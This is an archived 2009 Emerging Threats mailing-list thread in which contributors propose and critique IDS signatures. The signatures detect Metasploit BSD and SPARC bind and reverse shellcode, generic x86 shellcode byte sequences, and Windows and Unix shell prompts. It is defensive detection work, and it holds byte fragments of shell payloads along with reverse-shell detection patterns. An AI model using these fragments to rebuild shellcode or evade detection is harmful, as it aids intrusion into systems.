> f0 d0 23 bf f8|"; classtype:shellcode-detect; sid:666051; rev:5;)
> #### EOF BSD SPARC Bind Shell #########
> 
> 
> ### BSD SPARC Reverse Shell ########
> #BSD SPARC Reverse Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|9c 2b a0 07 94 1a c0 0b 92 10 20 01 90 10
> 20 02 82 10 20 61|"; classtype:shellcode-detect; sid:666052; rev:5;) alert ip
> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD SPARC
> Reverse shell"; content:"|91 d0 20 08 d0 23 bf f8 92 10 20 03 92 a2 60 01 82
> 10 20 5a|"; classtype:shellcode-detect; sid:666053; rev:5;) alert ip
> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD SPARC
> Reverse shell"; content:"|91 d0 20 08 12 bf ff fd d0 03 bf f8 21 3f c0|";
> classtype:shellcode-detect; sid:666054; rev:5;)
> 
> #BSD SPARC Reverse Shell - ENCODE: SPARC
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Reverse shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03
> e0 20 aa 9d 40 11|"; classtype:shellcode-detect; sid:666055; rev:5;) alert ip
> $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD SPARC
> Reverse shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf ff fb 9e
> 03 e0 04|"; classtype:shellcode-detect; sid:666056; rev:5;) #### EOF BSD SPARC
> Reverse Shell ####
> 
> 
> 
> 
> 
> 
> 
> #
> ### Shellcode develop patron by h0f JennyLab
> # Alberto Garcia de Dios
> # albertogdedios at andaluciajunta.es
> 
> 
> # Alpha payload
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
> shellcode"; content:"|49 49 49 49 49 49 49 49 49 49|";
> classtype:shellcode-detect; sid:666900; rev:5; nocase;)
> 
> 
> 
> 
> # Call payload label and pop next bytes.
>  #jmp short loader
>  #label:
>  #      code here
>  #loader:
>  # call label <--- here
>  # db '/bin/bash'
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
> shellcode"; content:"|e8|"; content:"|ff ff ff|"; distance:1;
> classtype:shellcode-detect; sid:666901; rev:5; nocase;)
> 
> 
> 
> 
> 
> # xor eax, eax | xor ebx, ebx
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor detect";
> content:"|31 c0 31 db|"; classtype:shellcode-detect; sid:666902; rev:5;
> nocase;)
> 
> 
> 
> # mov al, 0x01 | int 0x80
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit syscall";
> content:"|b0 01 cd 80|"; classtype:shellcode-detect; sid:666903; rev:5;
> nocase;)
> 
> 
> 
> # pop ebx on call returned and two interruptions in 60 bytes.
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode ebx pop and
> interrupt call"; content:"|5b|"; content:"|cd 80|"; content:"|cd 80|";
> within:60; classtype:shellcode-detect; sid:666904; rev:5; nocase;)
> 
> 
> # pop ecx to use in interruption and before jmp to label data loader # VMWare
> 2 server ( 8088 default port ) false positive.
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode pop ecx and
> call interrupt"; content:"|eb|"; content:"|59|"; content:"|cd 80|";
> within:512; classtype:shellcode-detect; sid:666905; rev:5; nocase;)
> 
> 
> # three push ( bsd shellcodes use very match push ) | very much false positive
> on ssh and other services. use !$SSH_PORT ( before define var ).
> #alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode push";
> content:"|68|"; content:"|68|"; content:"|68|"; content:"|68|"; within:12;
> classtype:shellcode-detect; sid:666906; rev:5; nocase;)
> 
> 
> # xor all regs
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor all
> registers"; content:"|31 c0|"; content:"|31 db|"; content:"|31 c9|";
> content:"|31 d2|"; distance:1; classtype:shellcode-detect; sid:666907; rev:5;
> nocase;)
> 
> 
> 
> #jmp out of seh win32 exploit \xEB\x06\x90\x90 | jmp +6 - nop - nop ( multiple
> exploits use).
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode jmp out of seh
> win32 exploit."; content:"|eb 06 90 90|"; classtype:shellcode-detect;
> sid:666908; rev:5; nocase;)
> 
> 
> # movl $0x01, %al | int 0x91
> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit Solaris.";
> content:"|b0 01 cd 91|"; classtype:shellcode-detect; sid:666908; rev:5;
> nocase;)
> 
> 
> 
> #
> # WINDOWS SHELL
> #
> 
> # C:\masm32> or C:\>
> # *:\*>
> #alert tcp any any -> any any (msg:"ET Windows shell execution 001";
> pcre:"/\w\:\x5c.*\x3c/"; sid:966600090; rev:1;)
> # \w\:\\.*\>
> alert tcp any any -> any any (msg:"ET Windows shell execution 001";
> pcre:"/\w\:\\.*\>/"; sid:966600090; rev:1;)
> 
> 
> # 12 dirs  83.453.632.512 bytes free
> # * dirs * bytes *
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 001";
> pcre:"/.*\d+\sdirs\s+.*bytes.*/"; sid:966600091; rev:1;)
> 
> # 2 Dir(s)  37.604.442.112 bytes free
> # * Dir(s) * bytes *
> # The tablet pc and other?? i dont know
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 002";
> pcre:"/.*\d+\sDir\(s\)\s+.*bytes.*/"; sid:966600095; rev:1;)
> 
> 
> # 02/03/2009  23:51    <DIR>          masm32
> # **/**/**** **:** <DIR> *
> alert tcp any any -> any any (msg:"ET Windows dir shell execution 003";
> pcre:"/\d{2}/\d{2}/\d{4}\s+\d{2}\:\d{2}\s+<DIR>\s+.*/"; sid:966600092; rev:1;)
> 
> 
> # %systemroot%
> alert tcp any any -> any any (msg:"ET Windows systemroot var"; content:"|25 73
> 79 73 74 65 6d 72 6f 6f 74 25|"; sid:966600093; rev:1;)
> 
> 
> # reg (query|add|delete|copy|save|restore|load|unload|compare|export|import)
> alert tcp any any -> any any (msg:"ET Windows registry edit";
> pcre:"/reg\s(query|add|delete|copy|save|restore|load|unload|compare|export|import).*/";
> sid:966600094; rev:1;)
> 
> 
> 
> #
> # Unix shell
> #
> 
> # comand >&0 <--- write on std with non create pipe shellcode
> alert tcp any any -> any any (msg:"ET Unix write out on std posible reverse
> shell"; pcre:"/.*>\&0/";sid:966608004; rev:1;)
> 
> 
> #Unix bash user and root ($ and #).
> #h0f at OpenSolarisLab:~$ | root at OpenSolarisLab:~#
> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
> pcre:"/.*\@.*\:\~\W(#|$)/";sid:966608005; rev:1;)
> 
> #Unix sh and pure bash ($ and #)
> # sh-3.2$ | sh-3.2#   /  bash-3.2$ | bash-3.2#
> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
> pcre:"/(sh|bash)\-\d\.\d\W(#|$)/";sid:966608006; rev:1;)
> 
> 
> 
> 
> 
> 
> 
> 
> 
> -- 
> Alberto Garcia de Dios.
> 
> 
> 
> 
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From mm at mare-system.de  Tue Dec  1 13:20:32 2009
From: mm at mare-system.de (Markus Manzke)
Date: Tue, 01 Dec 2009 19:20:32 +0100
Subject: [Emerging-Sigs] [Fwd: Re:  jennylab.rules]
Message-ID: <4B155E70.5020205@mare-system.de>


i once read that the best general order forperfomance is
headers (msg,flow,content,pcre,classtype,reference,sid,rev)
since we have some external_net any -> home_net any rules
it maybe usefull to order the rules by that suggestion.

and i read in the rules:
content:"|83 e9 ec d9 ee d9 74 24 f4 5b 81 73 13|"; classtype:shellcode-detect; nocase; distance:0; 
but doesn't nocase/distance etc need a preceding content?
i don't know if the classtype between content:".." and nocase; distance:... breaks
the two modifiers. 


mex



> Why the nocase if we're looking for specific byte values?  Thanks.
>
> Alberto Garcia de Dios wrote:
>> False positive reduced and add some references.
>>
>> On shell detection with pcre not posible use flow, could be reverse or bind
>> shell.
>> Thank.
>>
>>
>>
>> #
>> #
>> #####
>> # METASPLOIT SHELLCODE RULES
>> #####
>> #
>> #
>>
>>
>> #
>> # BSD METASPLOIT RULES
>> #
>>
>>
>> #### BSD BIND SHELL #######
>> # BSD Bind Shell - ENCODE: PexFnstenvSub
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|83 e9 ec d9 ee d9 74 24 f4 5b 81 73 13|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666000; rev:5;)
>>
>>
>> # BSD Bind Shell - ENCODE: CountDown
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|6a 4d 59 e8 ff ff ff ff c1 5e 30 4c 0e|";
>> content:"|e2 fa 6b 63 5b 9d 57 6e 17 0a|"; classtype:shellcode-detect;
>> nocase;
>> distance:1; flow:established,to_server; reference:url,www.metasploit.com;
>> sid:10666001; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|82 ed 5f 4c 5d 52 43 78 03 d9 95 8f 84 49 4a 48
>> 71
>> 74 45 d3|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666002;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|9f 90 4b ef a3 76 76 74 97 36 e4 aa bc 46 2f 77
>> 45
>> 6a 69 63|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666003;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|64 65 f8 b6 7e 41 cc 6a 53 13 12 4d 57 28 6e 20
>> 2a
>> 2a cc a5|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666004;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|17 1c 1a 19 fb 77 80 ce|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666005; rev:5;)
>>
>>
>> #BSD Bind Shell - ENCODE: Pex
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|c9 83 e9 ec e8 ff ff ff ff c0 5e 81 76 0e|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666006; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666007; rev:5;)
>>
>>
>> #BSD Bind Shell - ENCODE: None
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|6a 61 58 99 52 68 10 02|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666008; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|89 e1 52 42 52 42 52 6a 10 cd 80 99 93 51 53 52
>> 6a
>> 68 58 cd|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666009;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|80 b0 6a cd 80 52 53 52 b0 1e cd 80 97 6a 02 59
>> 6a
>> 5a 58 51|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666010;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|57 51 cd 80 49 79 f5 50 68 2f 2f 73 68 68 2f 62
>> 69
>> 6e 89 e3|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666011;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|50 54 53 53 b0 3b cd 80|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666012; rev:5;)
>>
>>
>>
>> #BSD Bind Shell - ENCODE: PexAlphaNum
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 4f 49 49 49 49 49
>> 49
>> 51 5a 56|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666012;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|54 58 36 33 30 56 58 34 41 30 42 36 48 48 30 42
>> 33
>> 30 42 43|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666013;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54
>> 42
>> 44 51 42|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666014;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|30 41 44 41 56 58 34 5a 38 42 44 4a 4f 4d 4c 36
>> 41|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:1066615;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|41 4e 44 35 44 34 44|";
>> classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666016; rev:5;)
>>
>>
>>
>> #BSD Bind Shell - ENCODE: PexFstEnvMov
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|6a 14 59 d9 ee d9 74 24 f4 5b 81 73 13|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666017; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666018; rev:5;)
>>
>>
>> #BSD Bind Shell - ENCODE: JmpCallAditive
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef
>> ff
>> ff ff|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666019;
>> rev:5;)
>>
>>
>> #BSD Bind Shell - ENCODE: Alpha2
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 49 49 49 49 49 49
>> 49
>> 49 49 49|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666020;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|41 42 32 42 41 32 41 41 30 41 41 58|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666021; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|49 72 4e 4e 69 6b 53|";
>> classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666022; rev:5;)
>> #### EOF BSD BIND SHELL ######
>>
>>
>>
>>
>>
>> ### BSD REVERSE SHELL #######
>> #BSD Reverse Shell - ENCODE: PexFnstenvSub
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|c9 83 e9 ef d9 ee d9 74 24 f4 5b 81 73 13|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666023; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666024; rev:5;)
>>
>>
>> #BSD Reverse Shell - ENCODE: Countdown
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|6a 43 59 e8 ff ff ff ff c1 5e 30 4c 0e 07 e2
>> fa
>> 6b 63 5b 9d|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666025;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|9f f6 72 09 4b 4b 4d 8a 74 7d 78 ec a2 49 26
>> 7c
>> 96 7d 79 7e|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666026;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|7b e6 ac 64 57 d9 60 59 1d 1c 47 5d 5e 18 5a
>> 50
>> 54 b2 df 6d|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666027;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|57 44 55 4a 5b 62|";
>> classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666028; rev:5;)
>>
>>
>>
>> #BSD Reverse Shell - ENCODE: Pex
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|c9 83 e9 ef e8 ff ff ff ff c0 5e 81 76 0e|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666029; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666030; rev:5;)
>>
>>
>> #BSD Reverse Shell - ENCODE: None
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|51 cd 80 49 79 f6 50 68 2f 2f 73 68 68 2f 62
>> 69
>> 6e 89 e3 50|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666031;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|6a 61 58 99 52 42 52 42 52 68|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666032; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|89 e1 6a 10 51 50 51 97 6a 62 58 cd 80 6a 02
>> 59
>> b0 5a 51 57|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666033;
>> rev:5;)
>>
>>
>>
>> #BSD Reverse Shell - ENCODE: PexAlphaNum
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|44 32 4d 4c 42 48 4a 46 42 31 44 50 50 41 4e
>> 4f
>> 49 38 41 4e|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666034;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|4c 36 42 41 41 35 42 45 41 35 47 59 4c 36 44
>> 56
>> 4a 35 4d 4c|"; classtype:shellcode-detect; sid:10666035; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44
>> 54
>> 42 44 51 42|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666036;
>> rev:5;)
>>
>>
>>
>> #BSD Reverse Shell - ENCODE: PexFnstenvMov
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|6a 11 59 d9 ee d9 74 24 f4 5b 81 73 13|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666037; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666038; rev:5;)
>>
>>
>>
>> #BSD Reverse Shell - ENCODE: JmpCallAditive
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8
>> ef
>> ff ff ff|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666039;
>> rev:5;)
>>
>>
>>
>> #BSD Reverse Shell - ENCODE: Alpha2
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|49 49 49 49 49 49 49 51 5a 6a|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666040; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|58 50 30 42 31 41 42 6b 42 41|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666041; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|32 41 41 30 41 41 58 50 38 42 42 75|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666042; rev:5;)
>> ##### EOF BSD Reverse Shell#####
>>
>>
>>
>>
>> ##### BSD SPARC Bind Shell #########
>> #BSD SPARC Bind Shell - ENCODE: SPARC
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03
>> e0
>> 20 aa 9d 40 11|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666043;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf
>> ff
>> fb 9e 03 e0 04|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666044;
>> rev:5;)
>>
>>
>> #BSD SPARC Bind Shell - ENCODE: None
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|e0 23 bf f0 c0 23 bf f4 92 23 a0 10 94 10
>> 20
>> 10 82 10 20 68|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666045;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|91 d0 20 08 d0 03 bf f8 92 10 20 01 82 10
>> 20
>> 6a 91 d0 20 08|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666046;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|d0 03 bf f8 92 1a 40 09 94 12 40 09 82 10
>> 20
>> 1e 91 d0 20 08|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666047;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b
>> bf
>> f0 d0 23 bf f8|"; classtype:shellcode-detect; sid:10666048; rev:5;)
>> #### EOF BSD SPARC Bind Shell #########
>>
>>
>> ### BSD SPARC Reverse Shell ########
>> #BSD SPARC Reverse Shell - ENCODE: None
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Reverse shell"; content:"|9c 2b a0 07 94 1a c0 0b 92 10 20 01 90
>> 10
>> 20 02 82 10 20 61|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666049;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Reverse shell"; content:"|91 d0 20 08 d0 23 bf f8 92 10 20 03 92
>> a2
>> 60 01 82 10 20 5a|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666050;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Reverse shell"; content:"|91 d0 20 08 12 bf ff fd d0 03 bf f8 21
>> 3f
>> c0|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666051;
>> rev:5;)
>>
>> #BSD SPARC Reverse Shell - ENCODE: SPARC
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Reverse shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea
>> 03
>> e0 20 aa 9d 40 11|"; classtype:shellcode-detect; nocase; distance:0;
